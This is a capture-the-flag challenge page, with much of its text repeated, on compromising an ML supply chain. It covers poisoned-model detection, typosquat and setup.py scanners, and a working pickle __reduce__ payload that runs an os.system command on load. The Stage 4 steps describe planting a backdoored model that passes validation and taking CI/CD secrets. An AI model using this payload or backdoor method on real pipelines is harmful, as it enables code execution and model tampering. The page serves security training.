CTF: Supply Chain Saboteur

進階11 分鐘閱讀更新於 2026-03-13

Identify and exploit supply chain vulnerabilities in a model deployment pipeline. Find poisoned models, exploit malicious packages, and compromise the ML infrastructure.

ctf supply-chain sabotage models

挑戰簡報

HelixCorp is deploying a new ML model pipeline. Your objective is to compromise this pipeline at multiple points in the supply chain -- from model training data through deployment to production. Each stage of the pipeline has vulnerabilities that mirror real-world supply chain attacks documented in industry incident reports.

Pipeline Architecture

┌─────────────┐    ┌──────────────┐    ┌───────────────┐    ┌──────────────┐
│  Model Hub  │───▶│  Training    │───▶│  Model        │───▶│  Production  │
│  (Registry) │    │  Pipeline    │    │  Registry     │    │  Deployment  │
│             │    │              │    │  (Internal)   │    │              │
│  Stage 1    │    │  Stage 2     │    │  Stage 3      │    │  Stage 4     │
└─────────────┘    └──────────────┘    └───────────────┘    └──────────────┘

Objectives and Scoring

Stage	Objective	Points
Stage 1	Identify a poisoned model on the public registry	150
Stage 2	Exploit a malicious dependency in the training pipeline	200
Stage 3	Achieve code execution via insecure model deserialization	250
Stage 4	Compromise the production deployment through the CI/CD pipeline	300
Bonus	Document a complete attack chain from registry to production	+200
Bonus	Detect and report all vulnerabilities without 漏洞利用	+100

Maximum possible score: 1,200 points

Stage 1: Poisoned Model Detection

情境

HelixCorp downloads pre-trained models from a public model hub. One of the models available for download has been subtly poisoned -- it functions normally for most inputs but produces manipulated outputs for specific trigger inputs.

Challenge

Examine the available models and identify which one has been poisoned. Determine the trigger pattern and the nature of the poisoned behavior.

Model Inventory
List all models available for the target task on the registry. Note their upload dates, authors, download counts, and any quality metrics.
Provenance Analysis
Check the provenance of each model. Who uploaded it? Is there a verifiable training history? Do the training details match the claimed performance?
Behavioral Testing
Run each candidate model against a diverse test set. Compare outputs between models to identify anomalies. Pay attention to edge cases and unusual input patterns.
Trigger Hunting
If behavioral testing reveals anomalies, systematically search for the trigger pattern. Test with variations of the suspicious inputs to map the trigger's boundaries.

import hashlib
import json
import numpy as np
from pathlib import Path
 
def check_model_provenance(model_card: dict) -> list[str]:
    """Check a model card for supply chain risk indicators."""
    warnings = []
 
    # Check author verification
    if not model_card.get("author_verified", False):
        warnings.append("WARN: Author identity not verified")
 
    # Check training data documentation
    if "training_data" not in model_card:
        warnings.append("WARN: No training data documentation")
 
    # Check for suspiciously recent upload with high download count
    upload_age_days = model_card.get("age_days", 0)
    downloads = model_card.get("downloads", 0)
    if upload_age_days < 30 and downloads > 10000:
        warnings.append(
            f"WARN: {downloads} downloads in {upload_age_days} days "
            "-- potential artificial inflation"
        )
 
    # Check model hash against known-good registry
    if model_card.get("sha256") not in KNOWN_GOOD_HASHES:
        warnings.append("WARN: Model hash not in known-good registry")
 
    return warnings
 
def detect_backdoor_behavior(
    model,
    clean_inputs: list,
    trigger_candidates: list,
    threshold: float = 0.15,
) -> dict:
    """
    Compare model behavior on clean vs. potentially triggered inputs.
    A large divergence suggests backdoor behavior.
    """
    clean_outputs = [model.predict(x) for x in clean_inputs]
    results = {}
 
    for trigger in trigger_candidates:
        triggered_inputs = [inject_trigger(x, trigger) for x in clean_inputs]
        triggered_outputs = [model.predict(x) for x in triggered_inputs]
 
        # Measure behavioral divergence
        divergence = compute_output_divergence(clean_outputs, triggered_outputs)
        if divergence > threshold:
            results[trigger] = {
                "divergence": divergence,
                "affected_samples": sum(
                    1 for c, t in zip(clean_outputs, triggered_outputs)
                    if c != t
                ),
            }
 
    return results

提示

Hint	Cost	Content
Hint 1	-22 pts	Check model upload dates -- the poisoned model was uploaded recently
Hint 2	-37 pts	The trigger is a specific phrase embedded in the input text

Stage 2: Malicious Dependency Exploitation

情境

The training pipeline uses a requirements.txt that pulls packages from PyPI. One of the dependencies has been typosquatted -- it has a name very similar to a legitimate package but contains malicious code that executes during installation.

Challenge

Identify the malicious dependency, analyze what it does, and demonstrate 漏洞利用.

Dependency Audit
Review the requirements file and compare each package name against the canonical PyPI registry. Look for misspellings, character substitutions, and namespace confusion.
Package Analysis
Download the suspicious package and inspect its setup.py, init.py, and any post-install hooks. Malicious packages often execute code during pip install.
Payload Analysis
Determine what the malicious code does. Common payloads include: reverse shells, credential theft, environment variable exfiltration, or training data manipulation.

import difflib
from typing import Optional
 
# Known legitimate packages for ML pipelines
LEGITIMATE_PACKAGES = {
    "torch", "torchvision", "transformers", "datasets",
    "numpy", "scipy", "pandas", "scikit-learn",
    "tokenizers", "accelerate", "safetensors",
    "huggingface-hub", "evaluate", "peft",
}
 
def find_typosquats(
    requirements: list[str],
    known_packages: set[str] = LEGITIMATE_PACKAGES,
    threshold: float = 0.85,
) -> list[dict]:
    """
    Identify potential typosquatting in a requirements list.
    Returns packages that are suspiciously similar to known packages.
    """
    suspicious = []
    for req in requirements:
        pkg_name = req.split("==")[0].split(">=")[0].strip().lower()
        if pkg_name in known_packages:
            continue
 
        # Check similarity against known packages
        for legit in known_packages:
            ratio = difflib.SequenceMatcher(None, pkg_name, legit).ratio()
            if ratio >= threshold and pkg_name != legit:
                suspicious.append({
                    "package": pkg_name,
                    "similar_to": legit,
                    "similarity": ratio,
                    "warning": f"Possible typosquat of '{legit}'",
                })
    return suspicious
 
def analyze_setup_py(setup_content: str) -> list[str]:
    """Check setup.py for suspicious patterns."""
    red_flags = []
    suspicious_patterns = [
        ("subprocess", "Executes system commands"),
        ("os.system", "Executes system commands"),
        ("socket", "Network communication"),
        ("requests.post", "Sends data to external server"),
        ("base64.b64decode", "Decoded obfuscated payload"),
        ("exec(", "Dynamic code execution"),
        ("eval(", "Dynamic code evaluation"),
        ("__import__", "Dynamic module import"),
    ]
    for pattern, description in suspicious_patterns:
        if pattern in setup_content:
            red_flags.append(f"RED FLAG: {description} ({pattern})")
    return red_flags

提示

Hint	Cost	Content
Hint 1	-30 pts	One package name differs from its legitimate counterpart by a single character
Hint 2	-50 pts	Check the setup.py of each unfamiliar package for post-install hooks

Stage 3: Insecure Deserialization

情境

HelixCorp's internal model registry stores models in Python's pickle format. A model artifact in the registry contains a payload that executes arbitrary code when deserialized.

Challenge

Craft a malicious model file that, when loaded by the deployment pipeline, executes a payload to extract the flag from the production environment.

import pickle
import os
 
class MaliciousModel:
    """
    A class that executes arbitrary code when unpickled.
    Demonstrates why pickle should never be used for
    untrusted model files.
    """
    def __reduce__(self):
        # This method is called during deserialization
        # It can execute arbitrary code
        return (
            os.system,
            ("cat /flag.txt > /tmp/exfiltrated.txt",)
        )
 
def create_poisoned_model(output_path: str = "model.pkl"):
    """Create a model file that executes code on load."""
    payload = MaliciousModel()
    with open(output_path, "wb") as f:
        pickle.dump(payload, f)
    print(f"Poisoned model written to {output_path}")
 
def demonstrate_safe_alternative():
    """Show the safe alternative using safetensors."""
    from safetensors.torch import save_file, load_file
    import torch
 
    # Safetensors only stores tensor data, no code execution
    tensors = {"weight": torch.randn(10, 10)}
    save_file(tensors, "model.safetensors")
    loaded = load_file("model.safetensors")  # Safe -- no code runs

For a deeper treatment of pickle-based exploits, see pickle exploits.

提示

Hint	Cost	Content
Hint 1	-37 pts	The pipeline calls torch.load() without setting weights_only=True
Hint 2	-62 pts	Use reduce to inject a system command into the pickle payload

Stage 4: CI/CD Pipeline Compromise

情境

The final stage targets the CI/CD pipeline that deploys models to production. The pipeline pulls models from the internal registry, runs validation tests, and deploys to the production endpoint. There is a 漏洞 in the validation step.

Challenge

Exploit the CI/CD pipeline to deploy a model that contains a backdoor, bypassing the validation tests.

Approach

Analyze the CI/CD configuration for injection points
Identify what the validation tests check and what they miss
Craft a model that passes validation but contains a backdoor for specific trigger inputs
Exploit any secrets or credentials accessible from within the CI/CD environment

提示

Hint	Cost	Content
Hint 1	-45 pts	The validation tests only check accuracy on a fixed test set
Hint 2	-75 pts	A backdoored model that performs normally on the test set but has a trigger will pass validation

Agent Heist -- agent-level 漏洞利用
RAG Infiltrator -- data pipeline poisoning
Model Supply Chain -- theoretical foundations

參考資料

"Poisoning Language Models During Instruction Tuning" - Wan et al. (2023) - Research on backdoor injection through training data poisoning
"BadNets: Identifying Vulnerabilities in the Machine Learning Model Supply Chain" - Gu et al. (2019) - Foundational research on ML supply chain backdoor attacks
"OWASP Top 10 for LLM Applications: Supply Chain Vulnerabilities" - OWASP (2025) - Industry guidance on ML supply chain security
"Spinning Sequence-to-Sequence Models with Meta-Backdoors" - Bagdasaryan & Shmatikov (2022) - Advanced supply chain backdoor techniques for sequence models

Knowledge Check

Why is Python's pickle format a security risk for model serialization?

Knowledge Check

What makes typosquatting attacks particularly effective against ML teams?

CTF: Supply Chain Saboteur

進階11 分鐘閱讀更新於 2026-03-13

Identify and exploit supply chain vulnerabilities in a model deployment pipeline. Find poisoned models, exploit malicious packages, and compromise the ML infrastructure.

ctf supply-chain sabotage models

挑戰簡報

Pipeline Architecture

┌─────────────┐    ┌──────────────┐    ┌───────────────┐    ┌──────────────┐
│  Model Hub  │───▶│  Training    │───▶│  Model        │───▶│  Production  │
│  (Registry) │    │  Pipeline    │    │  Registry     │    │  Deployment  │
│             │    │              │    │  (Internal)   │    │              │
│  Stage 1    │    │  Stage 2     │    │  Stage 3      │    │  Stage 4     │
└─────────────┘    └──────────────┘    └───────────────┘    └──────────────┘

Objectives and Scoring

Stage	Objective	Points
Stage 1	Identify a poisoned model on the public registry	150
Stage 2	Exploit a malicious dependency in the training pipeline	200
Stage 3	Achieve code execution via insecure model deserialization	250
Stage 4	Compromise the production deployment through the CI/CD pipeline	300
Bonus	Document a complete attack chain from registry to production	+200
Bonus	Detect and report all vulnerabilities without 漏洞利用	+100

Maximum possible score: 1,200 points

Stage 1: Poisoned Model Detection

情境

Challenge

Examine the available models and identify which one has been poisoned. Determine the trigger pattern and the nature of the poisoned behavior.

Model Inventory
List all models available for the target task on the registry. Note their upload dates, authors, download counts, and any quality metrics.
Provenance Analysis
Check the provenance of each model. Who uploaded it? Is there a verifiable training history? Do the training details match the claimed performance?
Behavioral Testing
Run each candidate model against a diverse test set. Compare outputs between models to identify anomalies. Pay attention to edge cases and unusual input patterns.
Trigger Hunting
If behavioral testing reveals anomalies, systematically search for the trigger pattern. Test with variations of the suspicious inputs to map the trigger's boundaries.

import hashlib
import json
import numpy as np
from pathlib import Path
 
def check_model_provenance(model_card: dict) -> list[str]:
    """Check a model card for supply chain risk indicators."""
    warnings = []
 
    # Check author verification
    if not model_card.get("author_verified", False):
        warnings.append("WARN: Author identity not verified")
 
    # Check training data documentation
    if "training_data" not in model_card:
        warnings.append("WARN: No training data documentation")
 
    # Check for suspiciously recent upload with high download count
    upload_age_days = model_card.get("age_days", 0)
    downloads = model_card.get("downloads", 0)
    if upload_age_days < 30 and downloads > 10000:
        warnings.append(
            f"WARN: {downloads} downloads in {upload_age_days} days "
            "-- potential artificial inflation"
        )
 
    # Check model hash against known-good registry
    if model_card.get("sha256") not in KNOWN_GOOD_HASHES:
        warnings.append("WARN: Model hash not in known-good registry")
 
    return warnings
 
def detect_backdoor_behavior(
    model,
    clean_inputs: list,
    trigger_candidates: list,
    threshold: float = 0.15,
) -> dict:
    """
    Compare model behavior on clean vs. potentially triggered inputs.
    A large divergence suggests backdoor behavior.
    """
    clean_outputs = [model.predict(x) for x in clean_inputs]
    results = {}
 
    for trigger in trigger_candidates:
        triggered_inputs = [inject_trigger(x, trigger) for x in clean_inputs]
        triggered_outputs = [model.predict(x) for x in triggered_inputs]
 
        # Measure behavioral divergence
        divergence = compute_output_divergence(clean_outputs, triggered_outputs)
        if divergence > threshold:
            results[trigger] = {
                "divergence": divergence,
                "affected_samples": sum(
                    1 for c, t in zip(clean_outputs, triggered_outputs)
                    if c != t
                ),
            }
 
    return results

提示

Hint	Cost	Content
Hint 1	-22 pts	Check model upload dates -- the poisoned model was uploaded recently
Hint 2	-37 pts	The trigger is a specific phrase embedded in the input text

Stage 2: Malicious Dependency Exploitation

情境

Challenge

Identify the malicious dependency, analyze what it does, and demonstrate 漏洞利用.

Dependency Audit
Review the requirements file and compare each package name against the canonical PyPI registry. Look for misspellings, character substitutions, and namespace confusion.
Package Analysis
Download the suspicious package and inspect its setup.py, init.py, and any post-install hooks. Malicious packages often execute code during pip install.
Payload Analysis
Determine what the malicious code does. Common payloads include: reverse shells, credential theft, environment variable exfiltration, or training data manipulation.

import difflib
from typing import Optional
 
# Known legitimate packages for ML pipelines
LEGITIMATE_PACKAGES = {
    "torch", "torchvision", "transformers", "datasets",
    "numpy", "scipy", "pandas", "scikit-learn",
    "tokenizers", "accelerate", "safetensors",
    "huggingface-hub", "evaluate", "peft",
}
 
def find_typosquats(
    requirements: list[str],
    known_packages: set[str] = LEGITIMATE_PACKAGES,
    threshold: float = 0.85,
) -> list[dict]:
    """
    Identify potential typosquatting in a requirements list.
    Returns packages that are suspiciously similar to known packages.
    """
    suspicious = []
    for req in requirements:
        pkg_name = req.split("==")[0].split(">=")[0].strip().lower()
        if pkg_name in known_packages:
            continue
 
        # Check similarity against known packages
        for legit in known_packages:
            ratio = difflib.SequenceMatcher(None, pkg_name, legit).ratio()
            if ratio >= threshold and pkg_name != legit:
                suspicious.append({
                    "package": pkg_name,
                    "similar_to": legit,
                    "similarity": ratio,
                    "warning": f"Possible typosquat of '{legit}'",
                })
    return suspicious
 
def analyze_setup_py(setup_content: str) -> list[str]:
    """Check setup.py for suspicious patterns."""
    red_flags = []
    suspicious_patterns = [
        ("subprocess", "Executes system commands"),
        ("os.system", "Executes system commands"),
        ("socket", "Network communication"),
        ("requests.post", "Sends data to external server"),
        ("base64.b64decode", "Decoded obfuscated payload"),
        ("exec(", "Dynamic code execution"),
        ("eval(", "Dynamic code evaluation"),
        ("__import__", "Dynamic module import"),
    ]
    for pattern, description in suspicious_patterns:
        if pattern in setup_content:
            red_flags.append(f"RED FLAG: {description} ({pattern})")
    return red_flags

提示

Hint	Cost	Content
Hint 1	-30 pts	One package name differs from its legitimate counterpart by a single character
Hint 2	-50 pts	Check the setup.py of each unfamiliar package for post-install hooks

import pickle
import os
 
class MaliciousModel:
    """
    A class that executes arbitrary code when unpickled.
    Demonstrates why pickle should never be used for
    untrusted model files.
    """
    def __reduce__(self):
        # This method is called during deserialization
        # It can execute arbitrary code
        return (
            os.system,
            ("cat /flag.txt > /tmp/exfiltrated.txt",)
        )
 
def create_poisoned_model(output_path: str = "model.pkl"):
    """Create a model file that executes code on load."""
    payload = MaliciousModel()
    with open(output_path, "wb") as f:
        pickle.dump(payload, f)
    print(f"Poisoned model written to {output_path}")
 
def demonstrate_safe_alternative():
    """Show the safe alternative using safetensors."""
    from safetensors.torch import save_file, load_file
    import torch
 
    # Safetensors only stores tensor data, no code execution
    tensors = {"weight": torch.randn(10, 10)}
    save_file(tensors, "model.safetensors")
    loaded = load_file("model.safetensors")  # Safe -- no code runs

For a deeper treatment of pickle-based exploits, see pickle exploits.

提示

Hint	Cost	Content
Hint 1	-37 pts	The pipeline calls torch.load() without setting weights_only=True
Hint 2	-62 pts	Use reduce to inject a system command into the pickle payload

Analyze the CI/CD configuration for injection points
Identify what the validation tests check and what they miss
Craft a model that passes validation but contains a backdoor for specific trigger inputs
Exploit any secrets or credentials accessible from within the CI/CD environment

提示

Hint	Cost	Content
Hint 1	-45 pts	The validation tests only check accuracy on a fixed test set
Hint 2	-75 pts	A backdoored model that performs normally on the test set but has a trigger will pass validation

Agent Heist -- agent-level 漏洞利用
RAG Infiltrator -- data pipeline poisoning
Model Supply Chain -- theoretical foundations

參考資料

"Poisoning Language Models During Instruction Tuning" - Wan et al. (2023) - Research on backdoor injection through training data poisoning
"BadNets: Identifying Vulnerabilities in the Machine Learning Model Supply Chain" - Gu et al. (2019) - Foundational research on ML supply chain backdoor attacks
"OWASP Top 10 for LLM Applications: Supply Chain Vulnerabilities" - OWASP (2025) - Industry guidance on ML supply chain security
"Spinning Sequence-to-Sequence Models with Meta-Backdoors" - Bagdasaryan & Shmatikov (2022) - Advanced supply chain backdoor techniques for sequence models

Knowledge Check

Why is Python's pickle format a security risk for model serialization?

Knowledge Check

What makes typosquatting attacks particularly effective against ML teams?

CTF: Supply Chain Saboteur

Model Inventory

Provenance Analysis

Behavioral Testing

Trigger Hunting

Dependency Audit

Package Analysis

Payload Analysis

相關文章

CTF: Supply Chain Saboteur

Model Inventory

Provenance Analysis

Behavioral Testing

Trigger Hunting

Dependency Audit

Package Analysis

Payload Analysis

相關文章